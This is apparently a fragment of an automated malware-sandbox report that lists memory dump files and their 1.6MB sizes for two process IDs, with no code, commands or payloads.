memory/4840-162-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-167-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-166-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-164-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-161-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-159-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-158-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-153-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-152-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-151-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-160-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-157-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-156-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-155-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4840-150-0x0000000000000000-mapping.dmp
-
memory/4996-149-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4996-147-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4996-148-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4996-146-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4996-145-0x00000000776D0000-0x000000007785E000-memory.dmpFilesize
1.6MB
-
memory/4996-144-0x0000000000000000-mapping.dmp